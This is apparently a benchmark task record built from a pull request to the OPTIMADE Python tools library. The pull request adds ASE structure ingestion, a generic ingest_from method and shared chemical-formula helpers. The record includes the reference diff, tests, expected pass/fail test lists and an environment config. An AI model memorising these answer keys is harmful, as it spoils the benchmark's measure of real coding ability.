diff --git a/README.md b/README.md index 3dea2fe7..7183842d 100644 --- a/README.md +++ b/README.md @@ -4,10 +4,7 @@ <img width="100px" align="center" src="https://matsci.org/uploads/default/original/2X/b/bd2f59b3bf14fb046b74538750699d7da4c19ac1.svg"> </div> -<h1 align="center"> -OPTIMADE Python tools -</h1> - +# <div align="center">OPTIMADE Python tools</div> <div align="center"> @@ -50,6 +47,7 @@ This is to enable interoperability among databases that serve crystal structures This repository contains a library of tools for implementing and consuming [OPTIMADE APIs](https://www.optimade.org) using Python: 1. [pydantic](https://github.com/pydantic/pydantic) data models for all [OPTIMADE entry types](https://www.optimade.org/optimade-python-tools/latest/all_models/) and endpoint responses, and a [Lark](https://github.com/lark-parser/lark) [EBNF grammar](https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_form) implementation for the OPTIMADE filter language. +1. Adapters to map OPTIMADE data to and from many commonly used atomistic Python frameworks (e.g., [pymatgen](https://pymatgen.org/), [ASE](https://wiki.fysik.dtu.dk/ase/)) and crystallographic file types (e.g., [CIF](https://www.iucr.org/resources/cif)), using the `optimade.adapters` module. 1. A configurable reference server implementation that can make use of either MongoDB or Elasticsearch database backends out-of-the-box, and is readily extensible to other backends. Try it out on the [demo site](https://optimade.fly.dev)! The OpenAPI schemas of the server are used to construct the [OPTIMADE schemas](https://schemas.optimade.org/) site. 1. An [OPTIMADE client](https://www.optimade.org/optimade-python-tools/latest/getting_started/client/) (`optimade-get`) that can query multiple [OPTIMADE providers](https://optimade.org/providers-dashboard) concurrently with a given filter, at the command-line or from Python code. 1. 
A fuzzy API validator tool, which may be called from the shell (`optimade-validator`) or used as a GitHub Action from [optimade-validator-action](https://github.com/Materials-Consortia/optimade-validator-action); this validator is used to construct the [providers dashboard](https://optimade.org/providers-dashboard). diff --git a/optimade/adapters/base.py b/optimade/adapters/base.py index d0849087..f1d4bcb6 100644 --- a/optimade/adapters/base.py +++ b/optimade/adapters/base.py @@ -34,6 +34,9 @@ class EntryAdapter: Attributes: ENTRY_RESOURCE: Entry resource to store entry as. _type_converters: Dictionary of valid conversion types for entry. + _type_ingesters: Dictionary of valid ingestion types mapped to ingestion functions. + _type_ingesters_by_type: Dictionary mapping the keys of `_type_ingesters` to data + types that can be ingested. as_<_type_converters>: Convert entry to a type listed in `_type_converters`. from_<_type_converters>: Convert an external type to the corresponding OPTIMADE model. @@ -42,6 +45,7 @@ class EntryAdapter: ENTRY_RESOURCE: Type[EntryResource] = EntryResource _type_converters: Dict[str, Callable] = {} _type_ingesters: Dict[str, Callable] = {} + _type_ingesters_by_type: Dict[str, Type] = {} def __init__(self, entry: dict) -> None: """ @@ -116,6 +120,48 @@ class EntryAdapter: return self._converted[format] + @classmethod + def ingest_from(cls, data: Any, format: Optional[str] = None) -> Any: + """Convert desired format to OPTIMADE format. + + Parameters: + data (Any): The data to convert. + format (str): Type or format to which the entry should be converted. + + Raises: + AttributeError: If `format` can not be found in `_type_ingesters`. + + Returns: + The ingested Structure. 
+ + """ + + if format is None: + for key, instance_type in cls._type_ingesters_by_type.items(): + if isinstance(data, instance_type): + format = key + break + + else: + raise AttributeError( + f"Non entry type to data of type {type(data)} from.\n" + f"Valid entry types: {tuple(cls._type_ingesters.keys())}" + ) + + if format not in cls._type_ingesters: + raise AttributeError( + f"Non-valid entry type to ingest from: {format}\n" + f"Valid entry types: {tuple(cls._type_ingesters.keys())}" + ) + + return cls( + { + "attributes": cls._type_ingesters[format](data).dict(), + "id": "", + "type": "structures", + } + ) + @staticmethod def _get_model_attributes( starting_instances: Union[Tuple[BaseModel, ...], List[BaseModel]], name: str diff --git a/optimade/adapters/structures/adapter.py b/optimade/adapters/structures/adapter.py index 5e9d8780..4ae62249 100644 --- a/optimade/adapters/structures/adapter.py +++ b/optimade/adapters/structures/adapter.py @@ -4,10 +4,12 @@ from optimade.adapters.base import EntryAdapter from optimade.models import StructureResource from .aiida import get_aiida_structure_data -from .ase import get_ase_atoms +from .ase import Atoms as ASEAtoms +from .ase import from_ase_atoms, get_ase_atoms from .cif import get_cif from .jarvis import get_jarvis_atoms from .proteindatabank import get_pdb, get_pdbx_mmcif +from .pymatgen import Structure as PymatgenStructure from .pymatgen import from_pymatgen, get_pymatgen @@ -55,4 +57,10 @@ class Structure(EntryAdapter): _type_ingesters: Dict[str, Callable] = { "pymatgen": from_pymatgen, + "ase": from_ase_atoms, + } + + _type_ingesters_by_type: Dict[str, Type] = { + "pymatgen": PymatgenStructure, + "ase": ASEAtoms, } diff --git a/optimade/adapters/structures/ase.py b/optimade/adapters/structures/ase.py index 93ea84bf..020487ed 100644 --- a/optimade/adapters/structures/ase.py +++ b/optimade/adapters/structures/ase.py @@ -10,10 +10,17 @@ For more information on the ASE code see [their 
documentation](https://wiki.fysi from typing import Dict from optimade.adapters.exceptions import ConversionError -from optimade.adapters.structures.utils import species_from_species_at_sites +from optimade.adapters.structures.utils import ( + elements_ratios_from_species_at_sites, + species_from_species_at_sites, +) from optimade.models import Species as OptimadeStructureSpecies from optimade.models import StructureFeatures from optimade.models import StructureResource as OptimadeStructure +from optimade.models.structures import StructureResourceAttributes +from optimade.models.utils import anonymize_formula, reduce_formula + +EXTRA_FIELD_PREFIX = "ase" try: from ase import Atom, Atoms @@ -26,7 +33,7 @@ except (ImportError, ModuleNotFoundError): ASE_NOT_FOUND = "ASE not found, cannot convert structure to an ASE Atoms" -__all__ = ("get_ase_atoms",) +__all__ = ("get_ase_atoms", "from_ase_atoms") def get_ase_atoms(optimade_structure: OptimadeStructure) -> Atoms: @@ -82,6 +89,69 @@ def get_ase_atoms(optimade_structure: OptimadeStructure) -> Atoms: atoms.append(Atom(symbol=species_name, position=site, mass=mass)) + info = {} + for key in attributes.dict().keys(): + if key.startswith("_"): + ase_key = key + if key.startswith(f"_{EXTRA_FIELD_PREFIX}_"): + ase_key = "".join(key.split(f"_{EXTRA_FIELD_PREFIX}_")[1:]) + info[ase_key] = getattr(attributes, key) + return Atoms( - symbols=atoms, cell=attributes.lattice_vectors, pbc=attributes.dimension_types + symbols=atoms, + cell=attributes.lattice_vectors, + pbc=attributes.dimension_types, + info=info if info else None, + ) + + +def from_ase_atoms(atoms: Atoms) -> StructureResourceAttributes: + """Convert an ASE `Atoms` object into an OPTIMADE `StructureResourceAttributes` model. + + Parameters: + atoms: The ASE `Atoms` object to convert. + + Returns: + An OPTIMADE `StructureResourceAttributes` model, which can be converted to a raw Python + dictionary with `.dict()` or to JSON with `.json()`. 
+ + """ + if not isinstance(atoms, Atoms): + raise RuntimeError( + f"Cannot convert type {type(atoms)} into an OPTIMADE `StructureResourceAttributes` model." + ) + + attributes = {} + attributes["cartesian_site_positions"] = atoms.positions.tolist() + attributes["lattice_vectors"] = atoms.cell.tolist() + attributes["species_at_sites"] = atoms.get_chemical_symbols() + attributes["elements_ratios"] = elements_ratios_from_species_at_sites( + attributes["species_at_sites"] + ) + attributes["species"] = species_from_species_at_sites( + attributes["species_at_sites"] ) + attributes["dimension_types"] = [int(_) for _ in atoms.pbc.tolist()] + attributes["nperiodic_dimensions"] = sum(attributes["dimension_types"]) + attributes["nelements"] = len(attributes["species"]) + attributes["elements"] = sorted([_.name for _ in attributes["species"]]) + attributes["nsites"] = len(attributes["species_at_sites"]) + + attributes["chemical_formula_descriptive"] = atoms.get_chemical_formula() + attributes["chemical_formula_reduced"] = reduce_formula( + atoms.get_chemical_formula() + ) + attributes["chemical_formula_anonymous"] = anonymize_formula( + attributes["chemical_formula_reduced"], + ) + attributes["last_modified"] = None + attributes["immutable_id"] = None + attributes["structure_features"] = [] + + for key in atoms.info: + optimade_key = key.lower() + if not key.startswith(f"_{EXTRA_FIELD_PREFIX}"): + optimade_key = f"_{EXTRA_FIELD_PREFIX}_{optimade_key}" + attributes[optimade_key] = atoms.info[key] + + return StructureResourceAttributes(**attributes) diff --git a/optimade/adapters/structures/pymatgen.py b/optimade/adapters/structures/pymatgen.py index 274c40f5..8d46bf7f 100644 --- a/optimade/adapters/structures/pymatgen.py +++ b/optimade/adapters/structures/pymatgen.py @@ -16,9 +16,10 @@ from optimade.adapters.structures.utils import ( from optimade.models import Species as OptimadeStructureSpecies from optimade.models import StructureResource as OptimadeStructure from 
optimade.models import StructureResourceAttributes +from optimade.models.utils import anonymize_formula, reduce_formula try: - from pymatgen.core import Composition, Lattice, Molecule, Structure + from pymatgen.core import Lattice, Molecule, Structure except (ImportError, ModuleNotFoundError): from warnings import warn @@ -168,14 +169,14 @@ def from_pymatgen(pmg_structure: Structure) -> StructureResourceAttributes: attributes["dimension_types"] = [int(_) for _ in pmg_structure.lattice.pbc] attributes["nperiodic_dimensions"] = sum(attributes["dimension_types"]) attributes["nelements"] = len(pmg_structure.composition.elements) - attributes["chemical_formula_anonymous"] = _pymatgen_anonymized_formula_to_optimade( - pmg_structure.composition + attributes["chemical_formula_anonymous"] = anonymize_formula( + pmg_structure.composition.formula ) attributes["elements"] = sorted( [_.symbol for _ in pmg_structure.composition.elements] ) - attributes["chemical_formula_reduced"] = _pymatgen_reduced_formula_to_optimade( - pmg_structure.composition + attributes["chemical_formula_reduced"] = reduce_formula( + pmg_structure.composition.formula ) attributes["chemical_formula_descriptive"] = pmg_structure.composition.formula attributes["elements_ratios"] = [ @@ -188,33 +189,3 @@ def from_pymatgen(pmg_structure: Structure) -> StructureResourceAttributes: attributes["structure_features"] = [] return StructureResourceAttributes(**attributes) - - -def _pymatgen_anonymized_formula_to_optimade(composition: Composition) -> str: - """Construct an OPTIMADE `chemical_formula_anonymous` from a pymatgen `Composition`.""" - import re - - from optimade.models.utils import anonymous_element_generator - - return "".join( - [ - "".join(x) - for x in zip( - anonymous_element_generator(), - reversed(re.split("[A-Z]", composition.anonymized_formula)[1:]), - ) - ] - ) - - -def _pymatgen_reduced_formula_to_optimade(composition: Composition) -> str: - """Construct an OPTIMADE `chemical_formula_reduced` 
from a pymatgen `Composition`.""" - import numpy - - numbers = [int(_) for _ in composition.to_reduced_dict.values()] - gcd = numpy.gcd.reduce(numbers) - return "".join( - _ - + f"{int(composition.to_reduced_dict[_]) // gcd if composition.to_reduced_dict[_] // gcd > 1 else ''}" - for _ in sorted([_.symbol for _ in composition.elements]) - ) diff --git a/optimade/adapters/structures/utils.py b/optimade/adapters/structures/utils.py index 0c2bf9f3..2b36570b 100644 --- a/optimade/adapters/structures/utils.py +++ b/optimade/adapters/structures/utils.py @@ -355,3 +355,14 @@ def species_from_species_at_sites( OptimadeStructureSpecies(name=_, concentration=[1.0], chemical_symbols=[_]) for _ in set(species_at_sites) ] + + +def elements_ratios_from_species_at_sites(species_at_sites: List[str]) -> List[float]: + """Compute the OPTIMADE `elements_ratios` field from `species_at_sites` in the case where `species_at_sites` refers + to sites wholly occupied by the given elements, e.g., not arbitrary species labels or with partial/mixed occupancy. + + """ + elements = set(species_at_sites) + counts = {e: species_at_sites.count(e) for e in elements} + num_sites = len(species_at_sites) + return [counts[e] / num_sites for e in sorted(elements)] diff --git a/optimade/models/structures.py b/optimade/models/structures.py index c9424254..aa89afe6 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -1,10 +1,7 @@ # pylint: disable=no-self-argument,line-too-long,no-name-in-module -import math import re -import sys import warnings from enum import Enum, IntEnum -from functools import reduce from typing import List, Optional, Union from pydantic import BaseModel, conlist, root_validator, validator @@ -18,6 +15,7 @@ from optimade.models.utils import ( OptimadeField, StrictField, SupportLevel, + reduce_formula, ) from optimade.warnings import MissingExpectedField @@ -895,18 +893,10 @@ The properties of the species are found in the property `species`. 
if value is None: return value - numbers = [n.strip() or 1 for n in re.split(r"[A-Z][a-z]*", value)] - # Need to remove leading 1 from split and convert to ints - numbers = [int(n) for n in numbers[1:]] - - if sys.version_info[1] >= 9: - gcd = math.gcd(*numbers) - else: - gcd = reduce(math.gcd, numbers) - - if gcd != 1: + reduced_formula = reduce_formula(value) + if reduced_formula != value: raise ValueError( - f"{field.name} {value!r} is not properly reduced: greatest common divisor was {gcd}, expected 1." + f"{field.name} {value!r} is not properly reduced: expected {reduced_formula!r}." ) return value diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 0474cdf9..8967b6d5 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -1,9 +1,11 @@ import inspect import itertools +import math import re import warnings from enum import Enum -from typing import TYPE_CHECKING, Optional +from functools import reduce +from typing import TYPE_CHECKING, List, Optional from pydantic import Field from pydantic.fields import FieldInfo @@ -228,6 +230,63 @@ def anonymous_element_generator(): yield "".join(s) +def _reduce_or_anonymize_formula( + formula: str, alphabetize: bool = True, anonymize: bool = False +) -> str: + """Takes an input formula, reduces it and either alphabetizes or anonymizes it.""" + import re + import sys + + numbers: List[int] = [ + int(n.strip() or 1) for n in re.split(r"[A-Z][a-z]*", formula)[1:] + ] + # Need to remove leading 1 from split and convert to ints + + species = re.findall("[A-Z][a-z]*", formula) + + if sys.version_info[1] >= 9: + gcd = math.gcd(*numbers) + else: + gcd = reduce(math.gcd, numbers) + + if not len(species) == len(numbers): + raise ValueError(f"Something is wrong with the input formula: {formula}") + + numbers = [n // gcd for n in numbers] + + if anonymize: + numbers = sorted(numbers, reverse=True) + species = [s for _, s in zip(numbers, anonymous_element_generator())] + + elif alphabetize: + species, 
numbers = zip(*sorted(zip(species, numbers))) + + return "".join(f"{s}{n if n != 1 else ''}" for n, s in zip(numbers, species)) + + +def anonymize_formula(formula: str) -> str: + """Takes a string representation of a chemical formula of the form `[A-Z][a-z]*[0-9]*` (potentially with whitespace) and + returns the OPTIMADE `chemical_formula_anonymous` representation, i.e., a reduced chemical formula comprising of element symbols + drawn from A, B, C... ordered from largest proportion to smallest. + + Returns: + The anonymous chemical formula in the OPTIMADE representation. + + """ + return _reduce_or_anonymize_formula(formula, alphabetize=False, anonymize=True) + + +def reduce_formula(formula: str) -> str: + """Takes a string representation of a chemical formula of the form `[A-Z][a-z]*[0-9]*` (potentially with whitespace) and + reduces it by the GCD of the proportion integers present in the formula, stripping any leftover "1" values. + + Returns: + The reduced chemical formula in the OPTIMADE representation. + + """ + return _reduce_or_anonymize_formula(formula, alphabetize=True, anonymize=False) + + ANONYMOUS_ELEMENTS = tuple(itertools.islice(anonymous_element_generator(), 150)) """ Returns the first 150 values of the anonymous element generator. """
Add ASE ingester and generalize other ingestion utilities This PR adds `from_ase` as a new ingester type (following #1296 for pymatgen) and generalises the ingester functionality into a `.ingest_from` method of the base adapter, e.g., ```python from optimade.adapters import Structure atoms = ase.Atoms(...) structure = pymatgen.core.Structure(...) Structure.ingest_from(atoms) # implicit type detection Structure.ingest_from(structure) # implicit type detection Structure.ingest_from(atoms, "ase") # use key into ingester dict to specify Structure.ingest_from(pymatgen, "pymatgen") # use key into ingester dict to specify ``` Also adds several utilities for e.g., normalizing formulae and other fields. These are now used in the adapters and spread across various utils modules (to avoid circular imports).
**Title** Add unified ingestion API and ASE support; centralize formula handling **Problem** The library only provided a specific ingester for pymatgen, lacking a generic entry‑point and support for ASE structures. Formula reduction and anonymization logic was duplicated across modules, leading to inconsistent validation. **Root Cause** Ingestion was spread over separate functions and dictionaries, and formula utilities were reimplemented instead of shared, preventing automatic type detection and consistent formula processing. **Fix / Expected Behavior** - Introduce a class‑level `ingest_from` method that detects the source type or accepts an explicit format key. - Register ASE as a valid ingestion source alongside pymatgen, with proper type mappings. - Populate extra ASE metadata into the OPTIMADE structure while preserving existing fields. - Provide a new utility to compute element ratios from site occupancies. - Consolidate formula reduction and anonymization into shared helpers used by both adapters and model validators. **Risk & Validation** - Verify that existing pymatgen ingestion continues to work unchanged. - Add tests exercising `ingest_from` with both ASE and pymatgen inputs, including implicit detection. - Confirm that reduced and anonymous formula validation now passes for all supported formats.
1,509
Materials-Consortia/optimade-python-tools
diff --git a/tests/adapters/structures/test_ase.py b/tests/adapters/structures/test_ase.py index a2062b2c..8e4103c8 100644 --- a/tests/adapters/structures/test_ase.py +++ b/tests/adapters/structures/test_ase.py @@ -45,3 +45,23 @@ def test_special_species(SPECIAL_SPECIES_STRUCTURES): def test_null_species(null_species_structure): """Make sure null species are handled""" assert isinstance(get_ase_atoms(null_species_structure), Atoms) + + +def test_extra_info_keys(RAW_STRUCTURES): + """Test that provider fields/ASE metadata is preserved during conversion.""" + structure = RAW_STRUCTURES[0] + structure["attributes"]["_ase_key"] = "some value" + structure["attributes"]["_ase_another_key"] = [1, 2, 3] + structure["attributes"]["_key_without_ase_prefix"] = [4, 5, 6] + + atoms = Structure(structure).as_ase + assert atoms.info["key"] == "some value" + assert atoms.info["another_key"] == [1, 2, 3] + assert atoms.info["_key_without_ase_prefix"] == [4, 5, 6] + + roundtrip_structure = Structure.ingest_from(atoms).attributes.dict() + assert roundtrip_structure["_ase_key"] == "some value" + assert roundtrip_structure["_ase_another_key"] == [1, 2, 3] + + # This key should have the _ase prefix re-added + assert roundtrip_structure["_ase__key_without_ase_prefix"] == [4, 5, 6] diff --git a/tests/adapters/structures/test_pymatgen.py b/tests/adapters/structures/test_pymatgen.py index b27de65c..f51c6649 100644 --- a/tests/adapters/structures/test_pymatgen.py +++ b/tests/adapters/structures/test_pymatgen.py @@ -18,7 +18,6 @@ from optimade.adapters import Structure from optimade.adapters.structures.pymatgen import ( _get_molecule, _get_structure, - from_pymatgen, get_pymatgen, ) @@ -56,29 +55,3 @@ def test_special_species(SPECIAL_SPECIES_STRUCTURES): def test_null_species(null_species_structure): """Make sure null species are handled""" assert isinstance(get_pymatgen(null_species_structure), PymatgenStructure) - - -def test_successful_ingestion(RAW_STRUCTURES): - import numpy as np - - 
lossy_keys = ( - "chemical_formula_descriptive", - "chemical_formula_hill", - "last_modified", - "assemblies", - "attached", - "immutable_id", - "species", - "fractional_site_positions", - ) - array_keys = ("cartesian_site_positions", "lattice_vectors") - for structure in RAW_STRUCTURES: - converted = from_pymatgen(get_pymatgen(Structure(structure))).dict() - for k in converted: - if k not in lossy_keys: - if k in array_keys: - np.testing.assert_almost_equal( - converted[k], structure["attributes"][k] - ) - else: - assert converted[k] == structure["attributes"][k] diff --git a/tests/adapters/structures/test_structures.py b/tests/adapters/structures/test_structures.py index fd82033c..0a96f57b 100644 --- a/tests/adapters/structures/test_structures.py +++ b/tests/adapters/structures/test_structures.py @@ -1,4 +1,5 @@ """Test Structure adapter""" + import pytest from optimade.adapters import Structure @@ -146,3 +147,88 @@ def test_common_converters(raw_structure, RAW_STRUCTURES): raw_structure_property_set = set(raw_structure.keys()) resource_property_set = set(Structure(raw_structure).as_dict.keys()) assert raw_structure_property_set.issubset(resource_property_set) + + +def compare_lossy_conversion(structure_attributes, reconverted_structure_attributes): + """Compare two structures, allowing for some loss of information and mapping of prefixed keys.""" + + try: + import numpy as np + except ImportError: + pytest.node.warn( + pytest.PytestWarning( + "numpy not found, some cases of conversion tests will be skipped" + ) + ) + np = None + + lossy_keys = ( + "chemical_formula_descriptive", + "chemical_formula_hill", + "last_modified", + "assemblies", + "attached", + "immutable_id", + "species", + "fractional_site_positions", + ) + array_keys = ("cartesian_site_positions", "lattice_vectors") + + for k in reconverted_structure_attributes: + if k not in lossy_keys: + if k in array_keys and np is not None: + np.testing.assert_almost_equal( + 
reconverted_structure_attributes[k], structure_attributes[k] + ) + elif k.startswith("_"): + # ugly way of checking if a substring exists in the initial structure + for i in range(len(k)): + subkey = k[i:] + if subkey in structure_attributes: + assert ( + reconverted_structure_attributes[k] + == structure_attributes[subkey] + ) + break + else: + raise ValueError(f"No subkey of {k} was found in initial structure") + + else: + assert reconverted_structure_attributes[k] == structure_attributes[k] + + +@pytest.mark.parametrize( + "format", + [k for k in Structure._type_ingesters.keys() if k in Structure._type_converters], +) +def test_two_way_conversion(RAW_STRUCTURES, format): + for structure in RAW_STRUCTURES: + new_structure = Structure(structure) + converted_structure = new_structure.convert(format) + if converted_structure is None: + continue + reconverted_structure = Structure.ingest_from( + converted_structure, format + ).entry.dict() + compare_lossy_conversion( + structure["attributes"], reconverted_structure["attributes"] + ) + + +@pytest.mark.parametrize( + "format", + [k for k in Structure._type_ingesters.keys() if k in Structure._type_converters], +) +def test_two_way_conversion_with_implicit_type(RAW_STRUCTURES, format): + for structure in RAW_STRUCTURES: + new_structure = Structure(structure) + converted_structure = new_structure.convert(format) + if converted_structure is None: + continue + reconverted_structure = Structure.ingest_from( + converted_structure, format=None + ).entry.dict() + + compare_lossy_conversion( + structure["attributes"], reconverted_structure["attributes"] + ) diff --git a/tests/adapters/structures/test_utils.py b/tests/adapters/structures/test_utils.py index 5cb1e763..107c90b1 100644 --- a/tests/adapters/structures/test_utils.py +++ b/tests/adapters/structures/test_utils.py @@ -162,3 +162,19 @@ def test_species_from_species_at_sites(): ], key=lambda _: _["name"], ) + + +def test_elements_ratios_from_sites(): + import numpy as np + 
+ from optimade.adapters.structures.utils import elements_ratios_from_species_at_sites + + assert np.allclose(elements_ratios_from_species_at_sites(["Si"]), [1.0]) + assert np.allclose(elements_ratios_from_species_at_sites(["Si", "Ge"]), [0.5, 0.5]) + assert np.allclose( + elements_ratios_from_species_at_sites(["Si", "Si", "Ge"]), [1 / 3, 2 / 3] + ) + assert np.allclose( + elements_ratios_from_species_at_sites(["Si", "Si", "Ge", "C", "C"]), + [0.4, 0.2, 0.4], + ) diff --git a/tests/models/test_structures.py b/tests/models/test_structures.py index 60f81156..213dfd5e 100644 --- a/tests/models/test_structures.py +++ b/tests/models/test_structures.py @@ -158,15 +158,15 @@ deformities = ( ), ( {"chemical_formula_reduced": "Ge2Si2"}, - "chemical_formula_reduced 'Ge2Si2' is not properly reduced: greatest common divisor was 2, expected 1.", + "chemical_formula_reduced 'Ge2Si2' is not properly reduced: expected 'GeSi'.", ), ( {"chemical_formula_reduced": "Ge144Si60V24"}, - "chemical_formula_reduced 'Ge144Si60V24' is not properly reduced: greatest common divisor was 12, expected 1.", + "chemical_formula_reduced 'Ge144Si60V24' is not properly reduced: expected 'Ge12Si5V2'.", ), ( {"chemical_formula_anonymous": "A10B5C5"}, - "chemical_formula_anonymous 'A10B5C5' is not properly reduced: greatest common divisor was 5, expected 1.", + "chemical_formula_anonymous 'A10B5C5' is not properly reduced: expected 'A2BC'", ), ( {"chemical_formula_anonymous": "A44B15C9D4E3F2GHI0J0K0L0"}, diff --git a/tests/models/test_utils.py b/tests/models/test_utils.py index 9374b16d..1b4cbaf5 100644 --- a/tests/models/test_utils.py +++ b/tests/models/test_utils.py @@ -116,3 +116,25 @@ def test_formula_regexp(): for formula in bad_formulae: with pytest.raises(ValidationError): assert DummyModel(formula=formula) + + +def test_reduce_formula(): + from optimade.models.utils import reduce_formula + + assert reduce_formula("Si1O2") == "O2Si" + assert reduce_formula("Si11O2") == "O2Si11" + assert 
reduce_formula("Si10O2C4") == "C2OSi5" + assert reduce_formula("Li1") == "Li" + assert reduce_formula("Li1Ge1") == "GeLi" + + +def test_anonymize_formula(): + from optimade.models.utils import anonymize_formula + + assert anonymize_formula("Si1O2") == "A2B" + assert anonymize_formula("Si11O2") == "A11B2" + assert anonymize_formula("Si10O2C4") == "A5B2C" + + assert anonymize_formula("Si1 O2") == "A2B" + assert anonymize_formula("Si11 O2") == "A11B2" + assert anonymize_formula("Si10 O2C4") == "A5B2C"
[ "tests/adapters/structures/test_structures.py::test_two_way_conversion[ase]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[ase]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity24]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity25]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity26]", "tests/models/test_utils.py::test_reduce_formula", "tests/models/test_utils.py::test_anonymize_formula" ]
[ "tests/adapters/structures/test_structures.py::test_instantiate", "tests/adapters/structures/test_structures.py::test_setting_entry", "tests/adapters/structures/test_structures.py::test_convert_wrong_format", "tests/adapters/structures/test_structures.py::test_getattr_order", "tests/adapters/structures/test_structures.py::test_no_module_conversion", "tests/adapters/structures/test_structures.py::test_common_converters", "tests/adapters/structures/test_structures.py::test_two_way_conversion[pymatgen]", "tests/adapters/structures/test_structures.py::test_two_way_conversion_with_implicit_type[pymatgen]", "tests/models/test_structures.py::test_good_structure_with_missing_data", "tests/models/test_structures.py::test_structure_fatal_deformities[None]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity1]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity2]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity3]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity4]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity5]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity6]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity7]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity8]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity9]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity10]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity11]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity12]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity13]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity14]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity15]", 
"tests/models/test_structures.py::test_structure_fatal_deformities[deformity16]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity17]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity18]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity19]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity20]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity21]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity22]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity23]", "tests/models/test_structures.py::test_structure_fatal_deformities[deformity27]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity0]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity1]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity2]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity3]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity4]", "tests/models/test_structures.py::test_structure_minor_deformities[deformity5]", "tests/models/test_utils.py::test_strict_field", "tests/models/test_utils.py::test_optimade_field", "tests/models/test_utils.py::test_compatible_strict_optimade_field", "tests/models/test_utils.py::test_formula_regexp" ]
Method: EntryAdapter.ingest_from(cls, data: Any, format: Optional[str] = None) Location: optimade.adapters.base.EntryAdapter (class method) Inputs: - **data** (Any): The object to be ingested (e.g., an ASE Atoms instance, a pymatgen Structure, etc.). - **format** (Optional[str]): Explicit key identifying the ingester to use (e.g., "ase", "pymatgen"). If omitted, the method attempts to infer the correct ingester by matching the type of *data* against the registered `_type_ingesters_by_type` mapping. Outputs: - Returns an instance of the calling adapter class (e.g., `Structure`) containing the ingested OPTIMADE entry (wrapped as a `StructureResource` with populated `attributes`). Description: Converts external structural data into the internal OPTIMADE representation, either by explicit format selection or by automatic type detection, and returns a fully‑initialised adapter object. Function: from_ase_atoms(atoms) Location: optimade.adapters.structures.ase Inputs: - **atoms** (ase.Atoms): An ASE Atoms object containing atomic positions, cell information, periodicity, and optional user‑defined `info` dictionary. Outputs: - **StructureResourceAttributes**: A populated OPTIMADE `StructureResourceAttributes` model (convertible to dict/JSON) containing lattice vectors, site positions, species information, elemental ratios, chemical formulas, dimensionality, and any ASE‑specific metadata re‑keyed with the `_ase_` prefix. Description: Translates an ASE Atoms object into the canonical OPTIMADE structure attributes, extracting both structural data and any custom metadata stored in `atoms.info`. Function: elements_ratios_from_species_at_sites(species_at_sites) Location: optimade.adapters.structures.utils Inputs: - **species_at_sites** (List[str]): List of element symbols (or species labels) ordered per atomic site, e.g., `["Si", "Ge", "Si"]`. 
Outputs: - **List[float]**: Ratios of each distinct element in the structure, sorted alphabetically by element symbol (e.g., for `["Si","Ge","Si"]` → `[0.666...,0.333...]` for Si then Ge). Description: Computes the `elements_ratios` field required by the OPTIMADE schema from a simple list of site‑wise element symbols, assuming full occupancy per site. Function: reduce_formula(formula) Location: optimade.models.utils Inputs: - **formula** (str): A chemical formula string (e.g., `"Si10O2C4"`), optionally containing whitespace. Outputs: - **str**: The formula reduced by the greatest common divisor of its stoichiometric integers and alphabetically ordered, with any trailing “1” omitted (e.g., `"C2OSi5"`). Description: Normalises chemical formulas to the OPTIMADE reduced representation, ensuring consistent ordering and removal of redundant unit factors. Function: anonymize_formula(formula) Location: optimade.models.utils Inputs: - **formula** (str): A chemical formula string (e.g., `"Si10O2C4"`), optionally containing whitespace. Outputs: - **str**: An anonymous OPTIMADE formula where element symbols are replaced by sequential letters (A, B, …) ordered by decreasing proportion (e.g., `"A5B2C"`). Description: Produces the `chemical_formula_anonymous` representation required by OPTIMADE by reducing the formula then mapping elements to anonymous identifiers based on their relative amounts.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/structures/test_ase.py tests/adapters/structures/test_pymatgen.py tests/adapters/structures/test_structures.py tests/adapters/structures/test_utils.py tests/models/test_structures.py tests/models/test_utils.py" }
